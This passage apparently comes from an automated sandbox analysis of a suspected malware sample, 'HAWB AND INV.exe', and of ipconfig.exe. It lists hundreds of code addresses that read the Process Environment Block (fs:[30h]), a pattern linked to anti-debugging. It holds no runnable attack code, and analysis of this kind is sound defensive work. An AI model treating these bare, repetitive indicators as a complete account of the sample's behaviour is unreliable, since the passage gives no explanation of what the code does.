          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01288DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01256DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01256DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01256DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01256DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01256DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01256DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011ED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011ED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01291C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01291C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01291C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01291C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01291C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01291C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01291C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01291C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01291C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01291C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01291C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01291C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01291C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01291C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01256C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01256C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01256C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01256C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011F746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0126C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0126C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012914FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01256CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01256CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01256CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011FF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0126FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0126FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011EEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011EFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01257794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01257794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01257794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012137F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0128FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01208E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01291608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012546A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0126FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012016E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01218EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0128FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012036CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AEAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AEAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B02AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B02ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B14A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B14A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AE8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B9AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B9AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AF3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02ADAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02ADAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B1927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B8B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B8B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B64257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B9EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B04BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B04BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B04BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AE1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AE1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B02397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B9138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B8D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AFDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B553CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B553CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B9131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B03B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B03B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02ADDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02ADDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02ADF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B190AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B53884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B53884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B6B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B6B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AEB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B57016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B57016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B57016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B92073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AF0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AF0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B061A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B061A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B569A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B02990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AFC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02ADB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02ADB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02ADB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B641E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AF4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AF4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AF4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AF4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AF4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02ADC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02ADB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02ADB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AFB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AFB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B546A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B6FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AE76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B016E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B18EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B8FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B036CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B8FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02ADE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02ADC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02ADC600 mov eax, dword ptr fs:[00000030h]
